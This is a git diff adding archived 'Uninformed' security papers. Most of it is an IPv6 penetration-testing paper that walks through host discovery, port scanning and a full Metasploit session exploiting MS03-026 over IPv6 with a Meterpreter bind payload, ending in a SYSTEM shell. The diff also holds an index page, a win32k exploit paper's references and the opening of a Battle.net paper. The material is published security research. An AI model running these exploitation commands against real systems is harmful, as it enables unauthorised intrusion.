+always a matter of proper checks; they also arise from system interaction and
+custom contexts.
+
+Implementing the usual userland protections is not a good solution, as kernel
+exploitation is broader than overflows. The win32k driver could be changed by
+using the userland abstraction layer in order to keep compatibility. This is
+not the easier choice, as it requires more time and work. The patch discussed
+in this paper improves win32k security somewhat, as it goes deeper than the
+reported vulnerabilities. However, the Windows Vista version of the win32k
+driver was affected by two of the vulnerabilities even though it was already
+more secure. Minor modifications do not solve security issues. Overall kernel
+security has been discussed in different papers about vulnerabilities as well
+as rootkits, and everyone agrees that operating systems must evolve. Windows
+Seven could introduce a new rights architecture that secures critical
+components, or simply improve the security of the win32k driver.
+
+References
+
+[1] Microsoft Corporation. Microsoft Security Bulletin MS08-025
+    http://www.microsoft.com/technet/security/Bulletin/MS08-025.mspx
+
+[2] Microsoft Corporation. Windows User Interface.
+    http://msdn.microsoft.com/en-us/library/ms632587(VS.85).aspx
+
+[3] Microsoft Corporation. SendMessage function.
+    http://msdn.microsoft.com/en-us/library/ms644950.aspx
+
+[4] ivanlef0u. You failed (blog entry about the KeUserModeCallback function, in French).
+    http://www.ivanlef0u.tuxfamily.org/?p=68
+
+[5] Microsoft Corporation. About Dynamic Data Exchange.
+    http://msdn.microsoft.com/en-us/library/ms648774.aspx
+
+[6] Microsoft Corporation. DDE Support in Internet Explorer Versions (still supported in IE7).
+    http://support.microsoft.com/kb/160957
+
+[7] Wikipedia. Integer overflow.
+    http://en.wikipedia.org/wiki/Integer_overflow
+
+[8] mxatone and ivanlef0u. Stealth hooking: Another way to subvert the Windows kernel.
+    http://www.phrack.org/issues.html?issue=65&id=4#article
+
+[9] Kostya Kortchinsky. Kernel pool exploitation (Syscan Hong Kong 2008).
+    http://www.syscan.org/hk/indexhk.html
+
+[10] Ruben Santamarta. Exploiting common flaws in drivers.
+     http://www.reversemode.com/index.php?option=com_remository&Itemid=2&func=fileinfo&id=51
+
+[11] Ruben Santamarta. Exploit for win32k!ntUserFnOUTSTRING (MS08-25/n).
+     http://www.reversemode.com/index.php?option=com_content&task=view&id=50&Itemid=1
+
+[12] Microsoft Corporation. MS08-025: Win32k vulnerabilities.
+     http://blogs.technet.com/swi/archive/2008/04/09/ms08-025-win32k-vulnerabilities.aspx
+
+[13] Cesar Cerrudo. Microsoft Windows kernel GDI local privilege escalation.
+     http://projects.info-pull.com/mokb/MOKB-06-11-2006.html
+
+[14] Microsoft Corporation. Steve Lipner and Michael Howard.
The Trustworthy Computing Security Development Lifecycle + http://msdn.microsoft.com/en-us/library/ms995349.aspx diff --git a/uninformed/10.4.txt b/uninformed/10.4.txt new file mode 100644 index 0000000..92e3e9e --- /dev/null +++ b/uninformed/10.4.txt @@ -0,0 +1,484 @@ +Exploiting Tomorrow's Internet Today: Penetration testing with IPv6 +10/2008 +H D Moore +hdm@metasploit.com + +Abstract: This paper illustrates how IPv6-enabled systems with link-local and +auto-configured addresses can be compromised using existing security tools. +While most of the techniques described can apply to "real" IPv6 networks, the +focus of this paper is to target IPv6-enabled systems on the local network. + +Acknowledgments: The author would like to thank Van Hauser of THC for his +excellent presentation at CanSecWest 2005 and for releasing the IPv6 Attack +Toolkit. Much of the background information in this paper is based on notes +from Van Hauser's presentation. The 'alive6' tool included with the IPv6 +Attack Toolkit is the critical first step for all techniques described in this +paper. The author would like to thank Philippe Biondi for his work on SCAPY +and for his non-traditional 3-D presentation on IPv6 routing headers at +CanSecWest 2007. + +1) Introduction + +The next iteration of the IP protocol, version 6, has been "just around the +corner" for nearly 10 years. Migration deadlines have come and gone, +networking vendors have added support, and all modern operating systems are +IPv6-ready. The problem is that few organizations have any intention of +implementing IPv6. The result is that most corporate networks contain machines +that have IPv6 networking stacks, but have not been intentionally configured +with IPv6. The IPv6 stack represents an attack surface that is often +overlooked in corporate environments. For example, many firewall products, +such as ZoneAlarm on Windows and the standard IPTables on Linux, do not block +IPv6 traffic (IPTables can, but it uses Netfilter6 rules instead). The goal of +this paper is to demonstrate how existing tools can be used to compromise IPv6 +enabled systems. + +1.2) Operating System + +All tools described in this paper were launched from an Ubuntu Linux 8.04 +system. If you are using Microsoft Windows, Mac OS X, BSD, or another Linux +distribution, some tools may work differently or not at all. + +1.3) Configuration + +All examples in this paper depend on the host system having a valid IPv6 stack +along with a link-local or auto-configured IPv6 address. This requires the +IPv6 functionality to be compiled into the kernel or loaded from a kernel +module. To determine if your system has an IPv6 address configured for a +particular interface, use the ifconfig command: + +# ifconfig eth0 | grep inet6 +inet6 addr: fe80::0102:03ff:fe04:0506/64 Scope:Link + +1.4) Addressing + +IPv6 addresses consist of 128 bits (16 bytes) and are represented as a groups +of four hex digits separated by colons. A set of two colons ("::") indicates +that the bits leading up to the next part of the address should be all zero. +For example, the IP address for the loopback/localhost consists of 15 NULL +bytes followed by one byte set to the value of 0x01. The representation for +this address is simply "::1" (IPv4 127.0.0.1). The "any" IPv6 address is +represented as "::0" or just "::" (IPv4 0.0.0.0). In the case of link-local +addresses, the prefix is always "fe80::" followed by the EUI-64 formatted MAC +address, while auto-configured addresses always have the prefix of "2000::". 
+The "::" sequence can only be used once within an IPv6 address (it would be +ambiguous otherwise). The following examples demonstrate how the "::" sequence +is used. + +0000:0000:0000:0000:0000:0000:0000:0000 == ::, ::0, 0::0, 0:0::0:0 +0000:0000:0000:0000:0000:0000:0000:0001 == ::1, 0::1, 0:0::0:0001 +fe80:0000:0000:0000:0000:0000:0000:0060 == fe80::60 +fe80:0000:0000:0000:0102:0304:0506:0708 == fe80::0102:0304:0506:0708 + +1.5) Link-local vs Site-local + +On a given local network, all IPv6 nodes have at least one link-local address +(fe80::). During the automatic configuration of IPv6 for a network adapter, a +link-local address is chosen, and an IPv6 router discovery request is sent to +the all-routers broadcast address. If any IPv6-enabled router responds, the +node will also choose a site-local address for that interface (2000::). The +router response indicates whether to use DHCPv6 or the EUI-64 algorithm to +choose a site-local address. On networks where there are no active IPv6 +routers, an attacker can reply to the router discovery request and force all +local IPv6 nodes to configure a site-local address. + +2) Discovery + +2.1) Scanning + +Unlike the IPv4 address space, it is not feasible to sequentially probe IPv6 +addresses in order to discover live systems. In real deployments, it is common +for each endpoint to receive a 64-bit network range. Inside that range, only +one or two active nodes may exist, but the address space is over four +billion times the size of the entire IPv4 Internet. Trying to discover live +systems with sequential probes within a 64-bit IP range would require at +least 18,446,744,073,709,551,616 packets. + +2.2) Management + +In order to manage hosts within large IPv6 network ranges, DNS and other +naming services are absolutely required. Administrators may be able to +remember an IPv4 address within a subnet, but tracking a 64-bit host ID within +a local subnet is a challenge. Because of this requirement, DNS, WINS, and +other name services are critical for managing the addresses of IPv6 hosts. +Since the focus of this paper is on "accidental" IPv6 networks, we will not be +covering IPv6 discovery through host management services. + +2.3) Neighbor Discovery + +The IPv4 ARP protocol goes away in IPv6. Its replacement consists of the +ICMPv6 Neighbor Discovery (ND) and ICMPv6 Neighbor Solicitation (NS) +protocols. Neighbor Discovery allows an IPv6 host to discover the link-local +and auto-configured addresses of all other IPv6 systems on the local network. +Neighbor Solicitation is used to determine if a given IPv6 address exists on +the local subnet. The linklocal address is guaranteed to be unique per-host, +per-link, by picking an address generated by the EUI-64 algorithm. This +algorithm uses the network adapter MAC address to generate a unique IPv6 +address. For example, a system with a hardware MAC of 01:02:03:04:05:06 would +use a link-local address of fe80::0102:03FF:FE04:0506. An eight-byte prefix is +created by taking the first three bytes of the MAC, appending FF:FE, and then +the next three bytes of the MAC. In addition to link-local addresses, IPv6 +also supports stateless auto-configuration. Stateless auto-configured +addresses use the "2000::" prefix. More information about Neighbor Discovery +can be found in RFC 2461. + +2.4) The IPv6 Attack Toolkit + +In order to enumerate local hosts using the Neighbor Discovery protocol, we +need a tool which can send ICMPv6 probes and listen for responses. 
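+
+As a quick aside, the EUI-64 derivation described in section 2.3 can be
+expressed in a few lines of C. The sketch below simply follows the
+construction given there (fe80:: prefix, first three MAC bytes, ff:fe, last
+three MAC bytes); note that the standard Modified EUI-64 algorithm also flips
+the universal/local bit of the first MAC byte, a step omitted here to match
+the description above.
+
+#include <stdio.h>
+
+/* Build a link-local IPv6 address string from a MAC address. */
+static void mac_to_link_local(const unsigned char mac[6], char *out, size_t len)
+{
+    snprintf(out, len, "fe80::%02x%02x:%02xff:fe%02x:%02x%02x",
+             mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]);
+}
+
+int main(void)
+{
+    const unsigned char mac[6] = { 0x01, 0x02, 0x03, 0x04, 0x05, 0x06 };
+    char addr[64];
+
+    mac_to_link_local(mac, addr, sizeof(addr));
+    printf("%s\n", addr);   /* prints fe80::0102:03ff:fe04:0506 */
+    return 0;
+}
+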
The alive6 +program included with Van Hauser's IPv6 Attack Toolkit is the tool for the +job. The example below demonstrates how to use alive6 to discover IPv6 hosts +attached to the network on the eth0 interface. + +# alive6 eth0 +Alive: fe80:0000:0000:0000:xxxx:xxff:fexx:xxxx +Alive: fe80:0000:0000:0000:yyyy:yyff:feyy:yyyy +Found 2 systems alive + +2.5) Linux Neighbor Discovery Tools + +The 'ip' command, in conjunction with 'ping6', both included with many recent +Linux distributions, can also be used to perform local IPv6 node discovery. +The following commands demonstrate this method: + +# ping6 -c 3 -I eth0 ff02::1 >/dev/null 2>&1 +# ip neigh | grep ^fe80 +fe80::211:43ff:fexx:xxxx dev eth0 lladdr 00:11:43:xx:xx:xx REACHABLE +fe80::21e:c9ff:fexx:xxxx dev eth0 lladdr 00:1e:c9:xx:xx:xx REACHABLE +fe80::218:8bff:fexx:xxxx dev eth0 lladdr 00:18:8b:xx:xx:xx REACHABLE +[...] + +2.6) Local Broadcast Addresses + +IPv6 Neighbor Discovery relies on a set of special broadcast addresses in +order to reach all local nodes of a given type. The table below enumerates the +most useful of these addresses. + + - FF01::1 = This address reaches all node-local IPv6 nodes + - FF02::1 = This address reaches all link-local IPv6 nodes + - FF05::1 = This address reaches all site-local IPv6 nodes + - FF01::2 = This address reaches all node-local IPv6 routers + - FF02::2 = This address reaches all link-local IPv6 routers + - FF05::2 = This address reaches all site-local IPv6 routers + +2.7) IPv4 vs IPv6 Broadcasts + +The IPv4 protocol allowed packets destined to network broadcast addresses to +be routed across the Internet. While this had some legitimate uses, this +feature was abused for years by traffic amplification attacks, which spoofed a +query to a broadcast address from a victim in order to saturate the victim's +bandwidth with the responses. While some IPv4 services were designed to work +with broadcast addresses, this is the exception and not the norm. With the +introduction of IPv6, broadcast addresses are no longer routed outside of the +local network. This mitigates traffic amplification attacks, but also prevents +a host from sending Neighbor Discovery probes into remote networks. + +One of the major differences between IPv4 and IPv6 is how network services +which listen on the "any" address (0.0.0.0 / ::0) handle incoming requests +destined to the broadcast address. A good example of this is the BIND DNS +server. When using IPv4 and listening to 0.0.0.0, DNS requests sent to the +network broadcast address are simply ignored. When using IPv6 and listening to +::0, DNS requests sent to the link-local all nodes broadcast address (FF02::1) +are processed. This allows a local attacker to send a message to all BIND +servers on the local network with a single packet. The same technique will +work for any other UDP-based service bound to the ::0 address of an +IPv6-enabled interface. + +$ dig metasploit.com @FF02::1 +;; ANSWER SECTION: +metasploit.com. 3600 IN A 216.75.15.231 +;; SERVER: fe80::xxxx:xxxx:xxxx:xxxx%2#53(ff02::1) + +3) Services + +3.1) Using Nmap + +The Nmap port scanner has support for IPv6 targets, however, it can only scan +these targets using the native networking libraries and does not have the +ability to send raw IPv6 packets. This limits TCP port scans to the +"connect()" method, which while effective, is slow against firewalled hosts +and requires a full TCP connection to identify each open port. Even with these +limitations, Nmap is still the tool of choice for IPv6 port scanning. 
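+
+For the sake of illustration, the connect()-style probe that Nmap falls back
+to for IPv6 can be approximated in a few lines of Python. The sketch below is
+only an example (the target address and port list are hypothetical) and relies
+on getaddrinfo() to parse the address, including a "%eth0" interface suffix on
+Linux:
+
+import socket
+
+target = "fe80::24c:44ff:fe4f:1a44%eth0"   # hypothetical link-local target
+for port in (22, 80, 135, 445, 3389):
+    try:
+        family, socktype, proto, _, sockaddr = socket.getaddrinfo(
+            target, port, socket.AF_INET6, socket.SOCK_STREAM)[0]
+        s = socket.socket(family, socktype, proto)
+        s.settimeout(2)
+        s.connect(sockaddr)        # a full TCP handshake for every probe
+        print("open:", port)
+        s.close()
+    except OSError:
+        pass                       # closed, filtered, or unreachable
+
+As with Nmap's connect() scan, every open port costs a complete TCP
+connection, which is why this approach is slow against firewalled hosts.
+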
Older +versions of Nmap did not support scanning link-local addresses, due to the +requirement of an interface suffix. Trying to scan a link-local address would +result in the following error. + +# nmap -6 fe80::xxxx:xxxx:xxxx:xxxx +Starting Nmap 4.53 ( http://insecure.org ) at 2008-08-23 14:48 CDT +Strange error from connect (22):Invalid argument + +The problem is that link-local addresses are interface specific. In order to +talk to to the host at fe80::xxxx:xxxx:xxxx:xxxx, we must indicate which +interface it is on as well. The way to do this on the Linux platform is by +appending a "%" followed by the interface name to the address. In this case, +we would specify "fe80::xxxx:xxxx:xxxx:xxxx%eth0". Recent versions of Nmap +(4.68) now support the interface suffix and have no problem scanning +link-local IPv6 addresses. Site-local addresses do not require a scope ID +suffix, which makes them a little bit easier to use from an attacker's +perspective (reverse connect code doesn't need to know the scope ID, just the +address). + +# nmap -6 fe80::xxxx:xxxx:xxxx:xxxx%eth0 +Starting Nmap 4.68 ( http://nmap.org ) at 2008-08-27 13:57 CDT +PORT STATE SERVICE +22/tcp open ssh + +3.2) Using Metasploit + +The development version of the Metasploit Framework includes a simple TCP port +scanner. This module accepts a list of hosts via the RHOSTS parameter and a +start and stop port. The Metasploit Framework has full support for IPv6 +addresses, including the interface suffix. The following example scans ports 1 +through 10,000 on the target fe80::xxxx:xxxx:xxxx:xxxx connected via interface +eth0. This target is a default install of Vista Home Premium. + +# msfconsole +msf> use auxiliary/discovery/portscan/tcp +msf auxiliary(tcp) > set RHOSTS fe80::xxxx:xxxx:xxxx:xxxx%eth0 +msf auxiliary(tcp) > set PORTSTART 1 +msf auxiliary(tcp) > set PORTSTOP 10000 +msf auxiliary(tcp) > run +[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:135 +[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:445 +[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1025 +[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1026 +[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1027 +[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1028 +[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1029 +[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1040 +[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:3389 +[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:5357 +[*] Auxiliary module execution completed + +In addition to TCP port scanning, the Metasploit Framework also includes a UDP +service detection module. This module sends a series of UDP probes to every +host defined by RHOSTS and prints out any responses received. This module +works with any IPv6 address, including the broadcast. For example, the session +below demonstrates discovery of a local DNS service that is listening on ::0 +and responds to requests for the link-local all nodes broadcast address. + +# msfconsole +msf> use auxiliary/scanner/discovery/sweep_udp +msf auxiliary(sweep_udp) > set RHOSTS ff02::1 +msf auxiliary(sweep_udp) > run +[*] Sending 7 probes to ff02:0000:0000:0000:0000:0000:0000:0001 (1 hosts) +[*] Discovered DNS on fe80::xxxx:xxxx:xxxx:xxxx%eth0 +[*] Auxiliary module execution completed + +4) Exploits + +4.1) IPv6 Enabled Services + +When conducting a penetration test against an IPv6 enabled system, the first +step is to determine what services are accessible over IPv6. 
In the previous +section, we described some of the tools available for doing this, but did not +cover the differences between the IPv4 and IPv6 interfaces of the same +machine. Consider the Nmap results below, the first set is from scanning the +IPv6 interface of a Windows 2003 system, while the second is from scanning the +same system's IPv4 address. + +# nmap -6 -p1-10000 -n fe80::24c:44ff:fe4f:1a44%eth0 +80/tcp open http +135/tcp open msrpc +445/tcp open microsoft-ds +554/tcp open rtsp +1025/tcp open NFS-or-IIS +1026/tcp open LSA-or-nterm +1027/tcp open IIS +1030/tcp open iad1 +1032/tcp open iad3 +1034/tcp open unknown +1035/tcp open unknown +1036/tcp open unknown +1755/tcp open wms +9464/tcp open unknown +# nmap -sS -p1-10000 -n 192.168.0.147 +25/tcp open smtp +42/tcp open nameserver +53/tcp open domain +80/tcp open http +110/tcp open pop3 +135/tcp open msrpc +139/tcp open netbios-ssn +445/tcp open microsoft-ds +554/tcp open rtsp +1025/tcp open NFS-or-IIS +1026/tcp open LSA-or-nterm +1027/tcp open IIS +1030/tcp open iad1 +1032/tcp open iad3 +1034/tcp open unknown +1035/tcp open unknown +1036/tcp open unknown +1755/tcp open wms +3389/tcp open ms-term-serv +9464/tcp open unknown + +Of the services provided by IIS, only the web server and streaming media +services appear to be IPv6 enabled. The SMTP, POP3, WINS, NetBIOS, and RDP +services were all missing from our scan of the IPv6 address. While this does +limit the attack surface on the IPv6 interface, the remaining services are +still significant in terms of exposure. The SMB port (445) allows access to +file shares and remote API calls through DCERPC. All TCP DCERPC services are +still available, including the endpoint mapper, which provides us with a list +of DCERPC applications on this system. The web server (IIS 6.0) is accessible, +along with any applications hosted on this system. The streaming media +services RTSP (554) and MMS (1755) provide access to the streaming content and +administrative interfaces. + +4.2) IPv6 and Web Browsers + +While most modern web browsers have support for IPv6 addresses within the URL +bar, there are complications. For example, with the Windows 2003 system above, +we see that port 80 is open. To access this web server with a browser, we use +the following URL: + +http://[fe80::24c:44ff:fe4f:1a44%eth0]/ + +Unfortunately, while Firefox and Konqueror can process this URL, Internet +Explorer (6 and 7) cannot. Since this is a link-local address, DNS is not +sufficient, because the local scope ID is not recognized in the URL. An +interesting difference between Firefox 3 and Konqueror is how the Host header +is created when specifying a IPv6 address and scope ID. With Firefox 3, the +entire address, including the local scope ID is sent in the HTTP Host header. +This causes IIS 6.0 to return an "invalid hostname" error back to the browser. +However, Konqueror will strip the local scope ID from the Host header, which +prevents IIS from throwing the error message seen by Firefox. + +4.3) IPv6 and Web Assessments + +One of the challenges with assessing IPv6-enabled systems is making existing +security tools work with the IPv6 address format (especially the local scope +ID). For example, the Nikto web scanner is an excellent tool for web +assessments, but it does not have direct support for IPv6 addresses. While we +can add an entry to /etc/hosts for the IPv6 address we want to scan and pass +this to Nikto, Nikto is unable to process the scope ID suffix. 
The solution to
+this and many other tool compatibility issues is to use a TCPv4 to TCPv6 proxy
+service. By far, the easiest tool for the job is Socat, which is available as
+a package on most Linux and BSD distributions. To relay local port 8080 to
+remote port 80 on a link-local IPv6 address, we use a command like the one
+below:
+
+$ socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[fe80::24c:44ff:fe4f:1a44%eth0]:80
+
+Once Socat is running, we can launch Nikto and many other tools against port
+8080 on 127.0.0.1.
+
+$ ./nikto.pl -host 127.0.0.1 -port 8080
+- Nikto v2.03/2.04
+---------------------------------------------------------------------------
++ Target IP:       127.0.0.1
++ Target Hostname: localhost
++ Target Port:     8080
++ Start Time:      2008-10-01 12:57:18
+---------------------------------------------------------------------------
++ Server: Microsoft-IIS/6.0
+
+This port forwarding technique works for many other tools and protocols and is
+a great fall-back when the tool of choice does not support IPv6 natively.
+
+4.4) Exploiting IPv6 Services
+
+The Metasploit Framework has native support for IPv6 sockets, including the
+local scope ID. This allows nearly all of the exploit and auxiliary modules to
+be used against IPv6 hosts with no modification. In the case of web
+application exploits, the VHOST parameter can be used to override the Host
+header sent by the module, avoiding issues like the one described above.
+
+4.5) IPv6 Enabled Shellcode
+
+To restrict all exploit activity to the IPv6 protocol, not only do the
+exploits need support for IPv6, but the payloads as well. IPv6 payload support
+is available in Metasploit through the use of "stagers". These stagers can be
+used to chain-load any of the common Windows payloads included with the
+Metasploit Framework. Once again, link-local addresses make this process a
+little more complicated. When using the bind_ipv6_tcp stager to open a
+listening port on the target machine, the RHOST parameter must have the local
+scope ID appended. By the same token, the reverse_ipv6_tcp stager requires
+that the LHOST variable have the remote machine's interface number appended as
+a scope ID. This can be tricky, since the attacker rarely knows what interface
+number a given link-local address corresponds to. For this reason, the
+bind_ipv6_tcp stager is ultimately more useful for exploiting Windows machines
+with link-local addresses. The example below demonstrates using the
+bind_ipv6_tcp stager with the Meterpreter stage. The exploit in this case is
+MS03-026 (Blaster) and is delivered over the DCERPC endpoint mapper service on
+port 135.
+
+msf> use exploit/windows/dcerpc/ms03_026_dcom
+msf exploit(ms03_026_dcom) > set RHOST fe80::24c:44ff:fe4f:1a44%eth0
+msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp
+msf exploit(ms03_026_dcom) > set LPORT 4444
+msf exploit(ms03_026_dcom) > exploit
+[*] Started bind handler
+[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
+[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...]
+[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...][135]
+[*] Sending exploit ...
+[*] The DCERPC service did not reply to our request
+[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
+[*] Sending stage (2650 bytes)
+[*] Sleeping before handling stage...
+[*] Uploading DLL (73227 bytes)...
+[*] Upload completed.
+[*] Meterpreter session 1 opened
+msf exploit(ms03_026_dcom) > sessions -i 1
+[*] Starting interaction with 1...
+
meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+
+5) Summary
+
+5.1) Key Concepts
+
+Even though most networks are not "IPv6" ready, many of the machines on those
+networks are. The introduction of a new protocol stack introduces security
+challenges that are not well-known and often overlooked during security
+evaluations. The huge address range of IPv6 makes remote discovery of IPv6
+machines difficult, but local network discovery is still possible using the
+all-nodes broadcast addresses. Link-local addresses are tied to a specific
+network link and are only guaranteed to be unique on the link where they
+reside. In order to communicate with an IPv6 node using a link-local address,
+the user must have knowledge of the local scope ID (interface) for that link.
+In order for a remote application to connect back to the user over a
+link-local address, the socket code must specify the local scope ID of the
+correct interface. UDP services which listen on the IPv6 ANY address (::0)
+will respond to client requests that are sent to the all-nodes broadcast
+address (FF02::1), which differs from IPv4. IPv6 broadcast traffic is not
+routable, which limits many attacks to the local network only. Even though
+many flavors of Linux, BSD, and Windows now enable IPv6 by default, not all
+applications support listening on the IPv6 interfaces. Software firewalls
+often allow IPv6 traffic even when configured to block all IPv4 traffic.
+Immunity CANVAS, the Metasploit Framework, the Nmap Security Scanner, and many
+other security tools now support IPv6 targets. It is possible to use a tool
+written for IPv4 against an IPv6 host by using a socket relay tool such as
+xinetd or socat.
+
+5.2) Conclusion
+
+Although the IPv6 backbone infrastructure continues to grow and an increasing
+number of client systems and devices support IPv6 out of the box, few ISPs are
+able to provide routing between the customer site and the backbone. Until this
+gap is closed, security assessments against IPv6 addresses will be limited to
+the local network. The lack of awareness about IPv6 in most organizations can
+provide an easy way for an attacker to bypass network controls and fly under
+the radar of many security monitoring tools. After all, when confronted with
+the message below, what is an administrator to do?
+
+References
+
+Exploits
+ - THC IPv6 Attack Toolkit - http://freeworld.thc.org/thc-ipv6/
+ - The Metasploit Framework - http://metasploit.com
+ - Immunity CANVAS - http://www.immunitysec.com/
+Tools
+ - ncat - svn co svn://svn.insecure.org/ncat (login: guest/guest)
+ - socat - http://www.dest-unreach.org/socat/
+ - scapy - http://www.secdev.org/projects/scapy/
+ - nmap - http://nmap.org/
+ - nikto - http://www.cirt.net/nikto2
+Documentation
+ - RFC 2461 - http://www.ietf.org/rfc/rfc2461.txt
+ - Official IPv6 Site - http://www.ipv6.org/
+Application Compatibility
+ - http://www.deepspace6.net/docs/ipv6statuspageapps.html
+ - http://www.stindustries.net/IPv6/tools.html
+ - http://www.ipv6.org/v6-apps.html
+ - http://applications.6pack.org/browse/support/
diff --git a/uninformed/10.txt b/uninformed/10.txt
new file mode 100644
index 0000000..630696a
--- /dev/null
+++ b/uninformed/10.txt
@@ -0,0 +1,24 @@
+
+
+Engineering in Reverse
+Can you find me now?
Unlocking the Verizon Wireless xv6800 (HTC Titan) GPS +Skywing +In August 2008 Verizon Wireless released a firmware upgrade for their xv6800 (rebranded HTC Titan) line of Windows Mobile smartphones that provided a number of new features previously unavailable on the device on the initial release firmware. In particular, support for accessing the device's built-in Qualcomm gpsOne assisted GPS chipset was introduced with this update. However, Verizon Wireless elected to attempt to lock down the GPS hardware on xv6800 such that only applications authorized by Verizon Wireless would be able to access the device's built-in GPS hardware and perform location-based functions (such as GPS-assisted navigation). The mechanism used to lock down the GPS hardware is entirely client-side based, however, and as such suffers from fundamental limitations in terms of how effective the lockdown can be in the face of an almost fully user-programmable Windows Mobile-based device. This article outlines the basic philosophy used to prevent unauthorized applications from accessing the GPS hardware and provides a discussion of several of the flaws inherent in the chosen design of the protection mechanism. In addition, several pitfalls relating to debugging and reverse engineering programs on Windows Mobile are also discussed. Finally, several suggested design alterations that would have mitigated some of the flaws in the current GPS lock down system from the perspective of safeguarding the privacy of user location data are also presented. +pdf | html | txt + +Using dual-mappings to evade automated unpackers +skape +Automated unpackers such as Renovo, Saffron, and Pandora's Bochs attempt to dynamically unpack executables by detecting the execution of code from regions of virtual memory that have been written to. While this is an elegant method of detecting dynamic code execution, it is possible to evade these unpackers by dual-mapping physical pages to two distinct virtual address regions where one region is used as an editable mapping and the second region is used as an executable mapping. In this way, the editable mapping is written to during the unpacking process and the executable mapping is used to execute the unpacked code dynamically. This effectively evades automated unpackers which rely on detecting the execution of code from virtual addresses that have been written to. +pdf | html | txt + +Exploitation Technology +Analyzing local privilege escalations in win32k +mxatone +This paper analyzes three vulnerabilities that were found in win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a major component of the GUI subsystem in the Windows operating system. These vulnerabilities have been reported by the author and patched in MS08-025. The first vulnerability is a kernel pool overflow with an old communication mechanism called the Dynamic Data Exchange (DDE) protocol. The second vulnerability involves improper use of the ProbeForWrite function within string management functions. The third vulnerability concerns how win32k handles system menu functions. Their discovery and exploitation are covered. +pdf | html | txt + +Exploiting Tomorrow's Internet Today: Penetration testing with IPv6 +H D Moore +This paper illustrates how IPv6-enabled systems with link-local and auto-configured addresses can be compromised using existing security tools. While most of the techniques described can apply to "real" IPv6 networks, the focus of this paper is to target IPv6-enabled systems on the local network. 
+pdf | html | txt + diff --git a/uninformed/2.1.txt b/uninformed/2.1.txt new file mode 100644 index 0000000..00e4308 --- /dev/null +++ b/uninformed/2.1.txt @@ -0,0 +1,453 @@ +Inside Blizzard: Battle.net +Skywing +skywinguninformed@valhallalegends.com +Last modified: 8/31/2005 + +1) Foreword + +Abstract: This paper intends to describe a variety of the problems Blizzard +Entertainment has encountered from a practical standpoint through their +implementation of the large-scale online game matchmaking and chat service, +Battle.net. The paper provides some background historical information into +the design and purpose of Battle.net and continues on to discuss a variety of +flaws that have been observed in the implementation of the system. Readers +should come away with a better understanding of problems that can be easily +introduced in designing a matchmaking/chat system to operate on such a large +scale in addition to some of the serious security-related consequences of not +performing proper parameter validation of untrusted clients. + + +2) Introduction + +First, a bit of historical and background information, leading up to the +present day. Battle.net is an online matchmaking service that allows players +to set up online games with other players. It is quite possibly the oldest +and largest system of it's kind currently in existence (launched in 1997). + +The basic services provided by Battle.net are game matchmaking and chat. The +matchmaking system allows one to create and join games with little or no prior +configuration required (other than picking game parameters, such as a map to +play on, or so-forth). The chat system is similar to a stripped-down version +of Internet Relay Chat. The primary differences between IRC and Battle.net +(for the purposes of the chat system) are that Battle.net only allows a user +to be present in one chat channel at once, and many of the channel parameters +that IRC users might be familiar with (maximum number of users in the channel, +who has channel operator privileges) are fixed to well-defined values by the +server. + +Battle.net supports a wide variety of Blizzard games, including Diablo, +Starcraft, Warcraft II: Battle.net Edition, Diablo II, and Warcraft III. In +addition, there are shareware versions of Diablo and Starcraft that are +supported on Battle.net, as well as optional expansions for Diablo II, +Starcraft, and Warcraft III. All of these games share a common binary +communication protocol that has evolved over the past 8 years, although +different games have differing capabilities with respect to the protocol. + +In some cases, this is due to differing requirements for the game clients, but +usually this is simply due to the older programs not being updated as +frequently as newer versions. In short, there are a number of different +dialects of the Battle.net binary protocol that are used by the various +supported products, all at the same time. In addition to supporting an +undocumented binary protocol, Battle.net has for some time now supported a +text-based protocol (the ``Chat Gateway'', as officialy documented). This +protocol supports a limited subset of the features available to clients using +the full game protocol. In particular, it lacks support for capabilities such +as account creation and management. + +Both of these protocols are now fairly well understood and documented certain +persons outside of Blizzard. 
Although the text-based protocol is documented +and fairly stable, the limitations inherent in it make it undesirable for many +uses. Furthermore, in order to help stem the flood of spam on Battle.net, +Blizzard changed their server software to prevent clients using the text-based +protocol from entering all but a few pre-defined chat channels. As a result +of this, many developers have reverse engineered (or more commonly, used the +work of those who came before them) the Battle.net binary protocol and written +their own "emulator" clients for various purposes (typically as a better +alternative to the limited chat facilities provided by Blizzard's game +clients). These clients emulate the behavior of a particular Blizzard game +program in order to trick Battle.net into providing the services typically +only offered to the game clients, hence the name ``emulator client''. Most of +these clients area referred to as ``emulator bots'' or ``emubots'' by their +developers, and the Battle.net community in general. In fact, there are also +partially compliant server implementations that implement the server-side chat +and matchmaking logic supported by Battle.net to varying degrees of accuracy. +One can today download a third party server that emulates the Battle.net +protocol, and a third party client that emulates a Blizzard client supporting +the Battle.net protocol, and have the two inter-operate. + + +3) Battle.net issues + +By virtue of supporting so many different game clients (at present, there are +11 distinct Blizzard-supported programs that connect to Battle.net), Blizzard +has a sizable version-control problem. In fact, this problem is compounded by +several issues. + +First, many client game patches add or change the protocol in significant +ways. For instance, the notion of password-protected, persistent player +accounts was not originally even designed into 